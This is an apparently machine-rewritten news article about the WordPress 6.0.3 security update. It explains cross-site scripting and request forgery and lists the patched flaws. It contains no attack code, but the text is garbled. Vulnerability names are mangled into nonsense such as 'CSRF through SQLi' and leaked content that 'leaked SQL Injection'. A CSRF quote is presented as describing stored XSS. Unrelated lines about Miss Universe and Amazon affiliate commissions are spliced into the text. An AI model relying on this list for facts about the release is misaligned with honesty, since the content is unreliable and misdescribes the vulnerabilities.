To fix many security issues found in WordPress versions prior to 6.0.3, WordPress released a security update. Every update since WordPress 3.7 has also been made by WordPress.
Risk of Cross-Site Scripting (XSS)
WordPress security advisories about numerous vulnerabilities were released by the US Government’s National Vulnerability Database.
A Cross-Site Scripting vulnerability, sometimes known as an XSS vulnerability, is one of many types that harm WordPress.
An online program like WordPress commonly develops a cross-site scripting vulnerability when it doesn’t thoroughly examine (sanitize) what is entered into a form or submitted through an upload input.
When a user visits a website, an attacker can send them a malicious script, which the user can then execute, giving the attacker access to sensitive data or cookies including user credentials.
A Stored XSS vulnerability was also found, which is regarded as being worse than a typical XSS assault.
When a user or logged-in user visits a website that has been subject to a stored XSS attack, the malicious script that was saved on the website is then executed.
This type of vulnerability is described on the security website of the nonprofit Open Web Application Security Project (OWASP) as follows:
“Cross-Site Request Forgery (CSRF) is an attack that compels a user who is currently logged in to a web application to perform undesirable actions.
An attacker can employ a little social engineering to persuade users of an online application to carry out their desired activities (for example, by delivering a link via email or chat).
If the victim is a regular user, a successful CSRF attack can compel them to carry out state-changing operations like money transfers, email address changes, and other such tasks.
Miss USA R’Bonney Gabriel, who won Miss Universe, promised to be “a transformational leader.”
The entire web application could be compromised by CSRF if the victim is an administrative account.
The vulnerabilities identified are as follows:
XSS stored through wp-mail.php (post by email)
Redirect in ‘wp nonce ays’ is open
In wp-mail.php, the sender’s email address is displayed.
Cross-Site Request Forgery (CSRF) through SQLi in the Media Library’s wp-trackback.php
through the Customizer, stored XSS
Reverse the introduction of shared user instances in 50790.
stored XSS by comment editing in the WordPress core
Data released using REST Terms/Tags Due to incorrect sanitization in “WP Date Query,” endpoint content from multipart emails leaked SQL Injection.
RSS Widget: Issue with stored XSS
XSS was saved in the search block.
Block of featured images: XSS problem
RSS Block: Issue with Stored XSS
Increased Affiliate Commission Rates at Amazon
Adjust widget XSS protection Recommended Action
WordPress advised all users to update their websites right away.